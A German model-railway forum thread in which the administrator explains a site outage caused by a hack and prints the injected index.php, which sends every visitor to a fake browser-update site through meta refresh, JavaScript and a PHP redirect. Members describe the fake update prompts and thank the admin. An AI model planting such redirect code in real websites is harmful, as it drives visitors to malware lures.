Infektion auf unserer Seite

[Fahrdienstleitung]

Kurze Info für Euch warum die Seite heute bis heute Nachmittag offline war

Heute am Nachmittag habe ich von unseren Volkhard die Info erhalten, das unsere Seite nicht online ist.
Nachdem ich bei meinem Provider nachgefragt hatte, schrieb er mir das die Seite sich einen Virus eingefangen hat (alle index.php) wurden geändert.
Unsere Datenbank wo eure Texte drin sind, die wurde nicht angegriffen.
Also habe ich schnell ein Backup der zerstörten Dateien eingespielt und die Seite war / ist wieder online.
Wie immer gilt:
Wenn ihr etwas findet was nicht funktioniert, lasst es mich wissen.

Euer Admin

Nachtrag:
Wer die Seite während sie nicht erreichbar war besucht haben sollte, hatte nie Kontakt zur Seite, da die Umleitung in der "index.php" sofort aktiv war.
Hier mal der Code von der "index.php" wem es interessiert.

Code: Alles auswählen

<!DOCTYPE HTML>
<html lang="en-US">
    <head>
        <meta charset="UTF-8">
        <meta http-equiv="refresh" content="0; url=https://browserupdate.space">
        <script type="text/javascript">
            window.location.href = "https://browserupdate.space"
        </script>
        <title>Loading</title>
    </head>
    <body>
	<?php
	header('Location: https://browserupdate.space');
	?>
    </body>
</html>

[vaueh]

Vielen Dank.

Heute morgen um 09.00h bestand das Problem wohl schon. Ich wurde unablässig umgeleitet und sollte
meinen Firefox auf Version 16.xx (das war so um 2012) updaten.

Hoffentlich hat niemand auf solchen Blödsinn reagiert.

Volker

[BR189]

Bei mir war es ein Chrome-Update. Lustiger weise direkt nachdem ich mein Chrome geupdated hatte, weswegen ich ein wenig verunsichert war.

[BikeMike]

Ich dachte erst, ich hätte selbst 'nen Virus eingefangen. Da aber die Zielseite nicht von mozilla war, guckte ich bei Chrome, Edge und Smartphone: Überall dieselbe Umleitung. Damit war klar, das Forum selbst war infiziert. Avast hat den Link übrigens auch als infiziert gemeldet. Hoffentlich hat sich niemand angesteckt. Und vielen Dank an die Forumsleitung für die schnelle Reparatur.

LG Michael

[SprengmeisterM]

Klasse für die schnelle Reaktion.
Ich war auch verunsichert, ich habe mit zwei Browsern und über das Handy versucht die Anlagenmeisterei zu erreichen. Als dies nicht funktionierte habe ich im EEP Forum einen Thread eröffnet um Nutzer zu warnen, denn im anderen Forum sind ja auch viele von uns unterwegs

Toll das ihr das Problem so schnell in den Griff bekommen habt

Viele Grüße Mirko

[Baureihe 62]

Wer glaubt den ernsthaft so'n sche...?

Selbstverständlich wird eine Seite wie die Anlagenmeisterei sofort gehackt. Es ist schließlich eine hochinformative Seite, von Experten betrieben und benutzt.

Da kommt ganz schnell der Neid auf. Und so versucht man halt, sein ADS-Problem mit einer Fake-Info zu vertuschen...

Wahrscheinlich war das Ziel, die Generation Vollpfosten noch dümmer dazustellen, als sie eh schon ist...
Vor allem dann, wenn "Chrome-Extensions" als Schadsoftware markiert werden. (UBlock & Ghostery sind wahrlich feine Helfer, aber garantiert KEINE Schadsoftware...:)

Danke an unseren Admin für das Wiederherstellen des Forums !!!

@Mirko:

Den Tröt beim EEP-Forum hättest du dir sparen können. Nicht, das ich nicht will, das andere durch Fehlinformationen geschädigt werden, aber die Admin-Reaktion zeigt doch sehr deutlich, wie es den "Besseren" am Ar... vorbei geht. BTW: Virusverseuchte Links und Datenausleserei? Da hat der Trend-Verlag weit die Nase vorn:

Auf meinem EEP+++Rechner hat der Windows Defender meinen HomeNos 14 als Malware & Trojaner mit Portöffnung entlarvt. Ergebnis: Der HN14 flog direkt von der Platte. Sogar die Verknüpfung auf dem Desktop hat der Defender gekillt. Die EXE war nicht einmal in Quarantäne! Soviel zur Virenseuche und Schadsoftware!

Ach so, falls jemand jetzt meint, das müsse ich im anderen Forum ansprechen; Habe ich, jetzt habe ich noch den "Gast"-Status...

Achtet stets auf solche "Virusfallen" wenn Ihr egal welche Seiten aufruft. Testet erst andere, euch vertraute und bekannte Seiten wie z.B. die Tageszeitung.

Gruß Dirk

PS: Trend liest vor allem den "My Project" oder "Meine Projekt"-Ordner aus.

[vorade]

...ich bedanke mich mal sehr beim Jörg, daß er so schnell reagieren konnte und nun Alles wieder läuft !!

Vielen Dank Jörg und viele Grüße

Volkhard

[Heizer_Lok]

Auf meinem EEP+++Rechner hat der Windows Defender meinen HomeNos 14 als Malware & Trojaner mit Portöffnung entlarvt. Ergebnis: Der HN14 flog direkt von der Platte. Sogar die Verknüpfung auf dem Desktop hat der Defender gekillt. Die EXE war nicht einmal in Quarantäne! Soviel zur Virenseuche und Schadsoftware!

In einem solchen Falle belasse ich die Software und setze diese als Ausnahme, und, sehr wichtig, ich sperre im Firewall das Programm, damit es nicht mehr nach Hause telefonieren kann.

Gruß
Albrecht